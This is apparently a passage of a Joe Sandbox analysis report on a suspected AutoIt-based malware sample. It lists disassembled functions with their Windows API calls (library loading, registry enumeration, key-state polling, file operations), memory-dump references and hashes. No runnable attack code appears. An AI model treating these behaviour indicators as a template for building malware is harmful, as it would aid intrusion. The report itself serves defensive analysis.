                                                                      • Opcode Fuzzy Hash: 2ed5cf98b2bbdc8b0f79f20dfc1bab9fc7ddbf6bab257920c2a9356de6654066
                                                                      • Instruction Fuzzy Hash: 2C21AE71204205AFEB109FA4EC80FBB37B9FB5A366F104618FD50E6190D771DC6A9B60
                                                                      Function 009E4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009E4D1E,009F28E9,?,009E4CBE,009F28E9,00A888B8,0000000C,009E4E15,009F28E9,00000002), ref: 009E4D8D
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009E4DA0
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,009E4D1E,009F28E9,?,009E4CBE,009F28E9,00A888B8,0000000C,009E4E15,009F28E9,00000002,00000000), ref: 009E4DC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 8afd0a15fe65fb02fb51ef78c6043fa0f4ecdcff21aa50a6405950ed9fd0d57d
                                                                      • Instruction ID: b249fee6ee9a261e30979b8f8c909d9b88fd5e50170881f56f1aaa12bb31143a
                                                                      • Opcode Fuzzy Hash: 8afd0a15fe65fb02fb51ef78c6043fa0f4ecdcff21aa50a6405950ed9fd0d57d
                                                                      • Instruction Fuzzy Hash: 1EF04F34A40708BFDB119FA1DC49BAEBBB9FF44762F0001A4F805A62A0CB746D81CB90
                                                                      Function 009C4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E9C
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009C4EAE
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-3689287502
                                                                      • Opcode ID: 1cdd6c375238f13f380b5917ff2f9411cc335422b4969c16886f32fdeb9b0ff7
                                                                      • Instruction ID: 4adc49a2f707233b92819a73f93b6021133b8cbf9a0e28af82b847aebb8a0077
                                                                      • Opcode Fuzzy Hash: 1cdd6c375238f13f380b5917ff2f9411cc335422b4969c16886f32fdeb9b0ff7
                                                                      • Instruction Fuzzy Hash: 8EE08636F01B226FD22157656C28F5B6658BF81F737060219FC00E3144DB64CD0281A1
                                                                      Function 009C4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A03CDE,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E62
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009C4E74
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00A03CDE,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E87
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-1355242751
                                                                      • Opcode ID: d8518456d8545561fb208ff2632548a9106c015feeb802aa27f425c28517b7c4
                                                                      • Instruction ID: 8ed20ec35c1e22c3346b3336741f929ada43d57f3a52ab8c0300a300033b4680
                                                                      • Opcode Fuzzy Hash: d8518456d8545561fb208ff2632548a9106c015feeb802aa27f425c28517b7c4
                                                                      • Instruction Fuzzy Hash: 0BD01236A02B216FDA225B697C28E8B6A1CBF85F723060619BD05A3119CF64CD02C5D2
                                                                      Function 00A4A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00A4A427
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A4A435
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A4A468
                                                                      • CloseHandle.KERNEL32(?), ref: 00A4A63D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: 8390071b8fc935f1c37cf195995f88efe1749e20aa8123c1d4fc16801245b558
                                                                      • Instruction ID: 601c4978ad8947a141f3c6086b75252414ed9ae430596ee286501cad028734c5
                                                                      • Opcode Fuzzy Hash: 8390071b8fc935f1c37cf195995f88efe1749e20aa8123c1d4fc16801245b558
                                                                      • Instruction Fuzzy Hash: 53A1AFB5644300AFD720DF24C886F2ABBE5AFD4714F14881DF59A9B392D7B0ED418B82
                                                                      Function 009FBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A63700), ref: 009FBB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00A9121C,000000FF,00000000,0000003F,00000000,?,?), ref: 009FBC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00A91270,000000FF,?,0000003F,00000000,?), ref: 009FBC36
                                                                      • _free.LIBCMT ref: 009FBB7F
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009FBD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID:
                                                                      • API String ID: 1286116820-0
                                                                      • Opcode ID: 14734ba82d3ad271373613ab0bb1f53caf18d3b9692e00bc9a0710ef2ceea2b4
                                                                      • Instruction ID: 2a0bda04f36d05584dc42e0d61dca085e75f50209e13d4b95ff7e979add6e940
                                                                      • Opcode Fuzzy Hash: 14734ba82d3ad271373613ab0bb1f53caf18d3b9692e00bc9a0710ef2ceea2b4
                                                                      • Instruction Fuzzy Hash: 1351CA7190020DEFCB10EFA9DC81ABEB7BCFF85760B10466AE664D7191EB709E418B50
                                                                      Function 00A2E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A2DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A2CF22,?), ref: 00A2DDFD
                                                                        • Part of subcall function 00A2DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A2CF22,?), ref: 00A2DE16
                                                                        • Part of subcall function 00A2E199: GetFileAttributesW.KERNEL32(?,00A2CF95), ref: 00A2E19A
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00A2E473
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00A2E4AC
                                                                      • _wcslen.LIBCMT ref: 00A2E5EB
                                                                      • _wcslen.LIBCMT ref: 00A2E603
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00A2E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3183298772-0
                                                                      • Opcode ID: cf46543e7f7df1314a81fd307eea1ac8d6c2e45fb7f6b5e9c2ae48a576cb2e31
                                                                      • Instruction ID: 6284f406860a0d4bdd729e4b786b271df765b6d827e35e7f15d885a09edb1228
                                                                      • Opcode Fuzzy Hash: cf46543e7f7df1314a81fd307eea1ac8d6c2e45fb7f6b5e9c2ae48a576cb2e31
                                                                      • Instruction Fuzzy Hash: 2F5164B24083955BC724EB94DC81EDF73ECAF84350F00492EF689D3192EF75A6888766
                                                                      Function 00A4B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A4B6AE,?,?), ref: 00A4C9B5
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4C9F1
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA68
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A4BAA5
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A4BB00
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A4BB63
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00A4BBA6
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4BBB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 826366716-0
                                                                      • Opcode ID: cf9beff50abed0849179d4e0d0a3e702b18487a8f6bb1b0b3063a427a7676259
                                                                      • Instruction ID: 91c66523dd78391de401fa6f11f3ee0a77361fefa4e49ead357d3cb3368a4545
                                                                      • Opcode Fuzzy Hash: cf9beff50abed0849179d4e0d0a3e702b18487a8f6bb1b0b3063a427a7676259
                                                                      • Instruction Fuzzy Hash: 29617C35218241AFC314DF14C895F2ABBE5FF84358F14896CF4994B2A2DB31ED46CBA2
                                                                      Function 00A28BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00A28BCD
                                                                      • VariantClear.OLEAUT32 ref: 00A28C3E
                                                                      • VariantClear.OLEAUT32 ref: 00A28C9D
                                                                      • VariantClear.OLEAUT32(?), ref: 00A28D10
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A28D3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: fd4e6872a7498d7879c8ea0c4743100545007c1ef93aed04ff3d1c827864e236
                                                                      • Instruction ID: 2ef3d06381e0ec1b57dd94be0806ad4ef28737230e21983c7231af584d707789
                                                                      • Opcode Fuzzy Hash: fd4e6872a7498d7879c8ea0c4743100545007c1ef93aed04ff3d1c827864e236
                                                                      • Instruction Fuzzy Hash: E4516AB5A01219EFDB10CF68D884AAAB7F8FF89310B158569F905DB354E734E911CB90
                                                                      Function 00A38AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A38BAE
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A38BDA
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A38C32
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A38C57
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A38C5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: 0b3918da8164eb7f465eadb1f10d0044a3f7a3c45848d9d9c778a1e6e95ae226
                                                                      • Instruction ID: 93690779c729204bdc11c7a8d57f688f90f2f72311b4387d5f6a1e1b7ebb4c68
                                                                      • Opcode Fuzzy Hash: 0b3918da8164eb7f465eadb1f10d0044a3f7a3c45848d9d9c778a1e6e95ae226
                                                                      • Instruction Fuzzy Hash: 3F513675A002159FCB00DF64C881EADBBF5BF88314F088059F849AB362CB35ED51CB91
                                                                      Function 00A48EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A48F40
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00A48FD0
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A48FEC
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00A49032
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00A49052
                                                                        • Part of subcall function 009DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A31043,?,7735E610), ref: 009DF6E6
                                                                        • Part of subcall function 009DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A1FA64,00000000,00000000,?,?,00A31043,?,7735E610,?,00A1FA64), ref: 009DF70D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      • Opcode ID: 972b2eceefcdb4c4cfdb04fa76a578881720c83a8b5b5adaf9a0cf10241553ab
                                                                      • Instruction ID: b2d9c16977a7298313bb08ab2dc33a423fd174f6059d63e27477dc84fe2636dc
                                                                      • Opcode Fuzzy Hash: 972b2eceefcdb4c4cfdb04fa76a578881720c83a8b5b5adaf9a0cf10241553ab
                                                                      • Instruction Fuzzy Hash: 88513C39A00205DFC711DF58C495DAEBBF1FF89324B048199E8069B762DB31ED86CB91
                                                                      Function 00A56B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A56C33
                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00A56C4A
                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A56C73
                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A3AB79,00000000,00000000), ref: 00A56C98
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A56CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MessageSendShow
                                                                      • String ID:
                                                                      • API String ID: 3688381893-0
                                                                      • Opcode ID: a2caff63f8c18f4f94e335b5ab0f488d8e037b8ac7e022e358d4b8a9a62c3c0c
                                                                      • Instruction ID: 7d6be3e420fa2b27ac1172b24de73cde8c56e2dc9d282fd6e17aeafaf67716e2
                                                                      • Opcode Fuzzy Hash: a2caff63f8c18f4f94e335b5ab0f488d8e037b8ac7e022e358d4b8a9a62c3c0c
                                                                      • Instruction Fuzzy Hash: 7741D335A04204AFDB24CF68CC59FA97BB5FB09361F950228FC95A72E1D771ED45CA40
                                                                      Function 009F2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 18d95eae4f80516a837a96277bc876945bacc70ef2d4d230fd3ff69132a8df20
                                                                      • Instruction ID: 3893f7c52b3efc4d8b405da366ab9ad04302816e6f578626e7f3845c3de3524c
                                                                      • Opcode Fuzzy Hash: 18d95eae4f80516a837a96277bc876945bacc70ef2d4d230fd3ff69132a8df20
                                                                      • Instruction Fuzzy Hash: CF41C432A002089FCB24DF78C981B6DB7F5EF89314F154569E615EB391DB31AD01CB90
                                                                      Function 009D912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 009D9141
                                                                      • ScreenToClient.USER32(00000000,?), ref: 009D915E
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 009D9183
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 009D919D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: 96efc2b198263e40b5e9057e1dbbc04522a7fc9c53d6af3dfa2b6c1467b910bc
                                                                      • Instruction ID: b99bd760cf45d0e689e43e0d1fa4a4340d9607057e7649ffafab8e0e6b1d795d
                                                                      • Opcode Fuzzy Hash: 96efc2b198263e40b5e9057e1dbbc04522a7fc9c53d6af3dfa2b6c1467b910bc
                                                                      • Instruction Fuzzy Hash: 97413F71A4861AFFDF19AF64C844BEEB775FB05324F208316E425A72A0C7346994CB91
                                                                      Function 00A33874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00A338CB
                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A33922
                                                                      • TranslateMessage.USER32(?), ref: 00A3394B
                                                                      • DispatchMessageW.USER32(?), ref: 00A33955
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A33966
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
